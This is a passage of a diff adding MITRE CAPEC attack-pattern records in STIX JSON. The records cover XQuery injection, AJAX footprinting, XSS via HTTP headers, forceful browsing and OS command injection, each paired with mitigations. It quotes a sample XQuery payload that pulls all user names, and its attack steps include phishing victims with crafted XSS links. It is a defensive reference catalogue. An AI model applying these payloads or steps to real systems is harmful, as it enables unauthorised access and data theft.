Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. 
The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.\n doc(accounts.xml)//user[Name='*']\n The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to XQL injection, attempt to inject characters that have special meaning in XQL. The goal is to create an XQL query with an invalid syntax.

  2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use XML files to inject input.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

Exploit

  1. Information Disclosure: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to inappropriate disclosure of information.

  2. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload. The payload aims to get information on the structure of the underlying XML database and/or the content in it.
  3. Manipulate the data in the XML database: The attacker crafts and injects an XQuery payload which is acted on by an XQL query leading to modification of application data.

  4. Techniques
    Leveraging one of the vulnerable inputs identified during the Experiment phase, inject malicious XQuery payload.. The payload tries to insert or replace data in the XML database.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The XQL must execute unvalidated data" + ], + "x_capec_skills_required": { + "Low": "Basic understanding of XQuery" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Perform input allowlist validation on all XML input", + "id": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5034c53d-3c8c-4bfa-991c-3bdf02939873", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3e0b4d8e-2893-4eea-8c84-541d3c43381a", + "spec_version": "2.1", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Run xml parsing and query infrastructure with minimal privileges so that an attacker is limited in their ability to probe other system resources from XQL.", + "id": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-84-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, 
+ { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2c10ee2c-94e2-4608-adae-9eedeae55591", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--79594b88-5cce-45e3-8b14-2f323ef0790c", + "spec_version": "2.1", + "target_ref": "attack-pattern--65c33cb5-cbae-4a8f-9895-2b7dc6a0f9f5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. 
The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.", + "external_references": [ + { + "external_id": "CAPEC-85", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/85.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Shreeraj Shah, Ajax fingerprinting for Web 2.0 Applications, Help Net Security", + "external_id": "REF-539", + "source_name": "reference_from_CAPEC", + "url": "https://www.helpnetsecurity.com/dl/articles/Ajax_fingerprinting.pdf" + } + ], + "id": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "modified": "2022-02-22T00:00:00.000Z", + "name": "AJAX Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346" + ], + 
"x_capec_child_of_refs": [ + "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Footprinting can be executed over almost any protocol including HTTP, TCP, UDP, and ICMP, with the general goal of gaining further information about a host environment to launch further attacks. The attacker can probe the system for banners, vulnerabilities, filenames, available services, and in short anything the host process has access to. The results of the probe are either used to execute javascript (for example, if the attackers' footprint script identifies a vulnerability in a firewall permission, then the client side script executes a javascript to change client firewall settings, or an attacker may simply echo the results of the scan back out to a remote host for targeting future attacks) or to inform other data gathering activities in order to craft atta." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Send request to target webpage and analyze HTML: Using a browser or an automated tool, an adversary sends requests to a webpage and records the received HTML response. Adversaries then analyze the HTML to identify any known underlying JavaScript architectures. This can aid in mappiong publicly known vulnerabilities to the webpage and can also helpo the adversary guess application architecture and the inner workings of a system.

  2. Techniques
    Record all \"src\" values inside script tags. These JavaScript files are compared to lists of files for known architectures. If there is a large match between the \"src\" values and architecture files, then it can be assumed that particular architecture is being used.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The user must allow JavaScript to execute in their browser" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "To land and launch a script on victim's machine with appropriate footprinting logic for enumerating services and vulnerabilities in JavaScript" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3d1586e2-3d5c-4ee5-9af8-6c3990a12afe", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--01f7ae1b-aa22-4c92-8b71-0f105dcbec8a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits web applications that generate web content, such as links in a HTML page, based on unvalidated or improperly validated data submitted by 
other actors. XSS in HTTP Headers attacks target the HTTP headers which are hidden from most users and may not be validated by web applications.", + "external_references": [ + { + "external_id": "CAPEC-86", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-80", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/80.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Cheatsheets, The Open Web Application Security Project (OWASP)", + "external_id": "REF-69", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/www-community/xss-filter-evasion-cheatsheet" + }, + { + "description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives", + "external_id": "REF-476", + "source_name": "reference_from_CAPEC", + "url": "http://seclists.org/fulldisclosure/2005/Dec/1107" + } + ], + "id": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "XSS Through HTTP Headers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--61b17787-fe92-427c-9e6a-6311997d7b2a", + "attack-pattern--b1eef783-daae-494c-a418-cd9ada7cbe8b", + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands 
(Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software", + "Software", + "Software" + ], + "x_capec_example_instances": [ + "\n Utilize a remote style sheet set in the HTTP header for XSS attack. When the adversary is able to point to a remote stylesheet, any of the variables set in that stylesheet are controllable on the client side by the remote adversary. Like most XSS attacks, results vary depending on browser that is used [REF-97].\n ; REL=stylesheet\">\n ", + "\n Google's 404 redirection script was found vulnerable to this attack vector.\n Google's 404 file not found page read\n * Response headers: \"Content-Type: text/html; charset=[encoding]\".\n * Response body: \n If the response sends an unexpected encoding type such as UTF-7, then no enforcement is done on the payload and arbitrary XSS code will be transported along with the standard HTTP response. [REF-476]\n ", + "XSS can be used in variety of ways, because it is scripted and executes in a distributed, asynchronous fashion it can create its own vector and openings. For example, the adversary can use XSS to mount a DDoS attack by having series of different computers unknowingly executing requests against a single host." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for public links: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the entry points (input) that becomes part of generated HTTP header (not only GET/POST/COOKIE, but also Content-Type, etc.)

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters used in the HTTP headers.
    Look for HTML meta tags that could be injectable
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. [Probe identified potential entry points for XSS vulnerability]The adversary uses the entry points gathered in the \"Explore\" phase as a target list and injects various common script payloads to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. They record all the responses from the server that include unmodified versions of their script.\n The adversary tries also to inject extra-parameter to the HTTP request to see if they are reflected back in the web page or in the HTTP response.\n

  2. Techniques
    Manually inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use an automated injection attack tool to inject various script payloads into each identified entry point using a list of common script injection probes and observe system behavior to determine if script was executed.
    Use a proxy tool to record results of manual input of XSS probes in known URLs.
  3. Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim.

  4. Techniques
    Change a URL parameter which is used in an HTTP header to include a malicious script tag. Because it is in the header it may bypass validation.
    Send information gathered from the malicious script to a remote endpoint.

Exploit

  1. Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

  2. Techniques
    Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
    Put the malicious URL on a public forum, where many victims might accidentally click the link.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Target software must be a client that allows scripting communication from remote hosts." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to deploy a custom hostile service for access by targeted clients and the abbility to communicate synchronously or asynchronously with client machine. The adversary must also control a remote site of some sort to redirect client and data to." + ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an adversary can simply edit HTTP Headers that are sent to client machine." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--117080d2-a3f1-4d19-8903-672ec63ff81f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--df64b21f-91ca-4495-9718-794582fa0ab8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--040cd51a-446a-4612-a9d0-4a90119d5191", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": 
"relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--43bfa851-97cf-48ba-8050-69a14ce4b820", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97eb8eeb-5e17-4a04-803b-c4de40723fc9", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e5a1a01-0c47-4cc1-9ce2-6156b3d231b7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9836d98-9116-4902-ba62-2c4fcc7e03c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0b609b9c-0b10-497b-b953-c1d279689017", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8a996efc-52e0-4aaf-953a-21c3fe64c64b", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d72764d4-b17e-42fe-81ba-463f07deb30f", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f20a4a7-cb6a-477b-a12a-13c5e9d03353", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4e7dfa2a-7e3f-483c-bd32-1110f0cbfb03", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f31f11cb-6403-4667-bf43-d77242ac7ae2", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c80de0f3-14b1-4da8-ab8f-01d6e8887f58", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--86dea14b-a9d1-461f-a1e0-ff289490c27e", + "spec_version": "2.1", + "target_ref": "attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--77b4da2d-507c-490d-8270-6c9c321c6752", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd1a110f-6520-479b-9f42-9c88acdbf90e", + "spec_version": "2.1", + "target_ref": 
"attack-pattern--39322012-07ba-4bfc-bac7-10891614ee3e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.", + "external_references": [ + { + "external_id": "CAPEC-87", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/87.html" + }, + { + "external_id": "CWE-425", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/425.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Predictable Resource Location", + "external_id": "34", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Predictable-Resource-Location" + }, + { + "description": "Forced browsing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Forced_browsing" + } + ], + "id": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Forceful Browsing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + 
], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A bulletin board application provides an administrative interface at admin.aspx when the user logging in belongs to the administrators group.\n An attacker can access the admin.aspx interface by making a direct request to the page. Not having access to the interface appropriately protected allows the attacker to perform administrative functions without having to authenticate themself in that role.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Spider: Using an automated tool, an attacker follows all public links on a web site. They record all the links they find.

  2. Techniques
    Use a spidering tool to follow and record all links.
    Use a proxy tool to record all links visited during a manual traversal of the web application.

Experiment

  1. Attempt well-known or guessable resource locations: Using an automated tool, an attacker requests a variety of well-known URLs that correspond to administrative, debugging, or other useful internal actions. They record all the positive responses from the server.

  2. Techniques
    Use a spidering tool to follow and record attempts on well-known URLs.
    Use a proxy tool to record all links visited during a manual traversal of attempts on well-known URLs.

Exploit

  1. Use unauthorized resources: By visiting the unprotected resource, the attacker makes use of unauthorized functionality.

  2. Techniques
    Access unprotected functions and execute them.
  3. View unauthorized data: The attacker discovers and views unprotected sensitive data.

  4. Techniques
    Direct request of protected pages that directly access database back-ends. (e.g., list.jsp, accounts.jsp, status.jsp, etc.)
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The forcibly browseable pages or accessible resources must be discoverable and improperly protected." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. A directory listing is helpful, but not a requirement." + ], + "x_capec_skills_required": { + "Low": "Forcibly browseable pages can be discovered by using a number of automated tools. Doing the same manually is tedious but by no means difficult." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticate request to every resource. In addition, every page or resource must ensure that the request it is handling has been made in an authorized context.", + "id": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c3b65115-d4f0-4a7d-a9d8-7c012f7e3787", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8b71c095-ad74-4c7c-9670-929e14eb0110", + "spec_version": "2.1", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Forceful browsing can also be made 
difficult to a large extent by not hard-coding names of application pages or resources. This way, the attacker cannot figure out, from the application alone, the resources available from the present context.", + "id": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-87-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6172678d-c4c1-4700-9518-deec24ab23cc", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94eb039d-4dcb-40b2-bf6f-e98fe456747c", + "spec_version": "2.1", + "target_ref": "attack-pattern--00268a75-3243-477d-9166-8c78fddf6df6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. 
An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.", + "external_references": [ + { + "external_id": "CAPEC-88", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-78", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/78.html" + }, + { + "external_id": "CWE-88", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/88.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "OS Commanding", + "external_id": "31", + "source_name": "WASC", + "url": "http://projects.webappsec.org/OS-Commanding" + }, + { + "description": "Secunia Advisory SA16869: Firefox Command Line URL Shell Command Injection, Secunia Advisories, 2005--09---20, Secunia", + "external_id": "REF-543", + "source_name": "reference_from_CAPEC", + "url": "http://secunia.com/advisories/16869/" + } + ], + "id": "attack-pattern--bfdeb5d3-c9da-44eb-bfd3-d3db719acfb3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "OS Command Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass 
Protection Mechanism", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A transaction processing system relies on code written in a number of languages. To access this functionality, the system passes transaction information on the system command line.\n An attacker can gain access to the system command line and execute malicious commands by injecting these commands in the transaction data. If successful, the attacker can steal information, install backdoors and perform other nefarious activities that can compromise the system and its data.See also: A vulnerability in Mozilla Firefox 1.x browser allows an attacker to execute arbitrary commands on the UNIX/Linux operating system. The vulnerability is caused due to the shell script used to launch Firefox parsing shell commands that are enclosed within back-ticks in the URL provided via the command line. This can be exploited to execute arbitrary shell commands by tricking a user into following a malicious link in an external application which uses Firefox as the default browser (e.g. the mail client Evolution on Red Hat Enterprise Linux 4)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify inputs for OS commands: The attacker determines user controllable input that gets passed as part of a command to the underlying operating system.

  2. Techniques
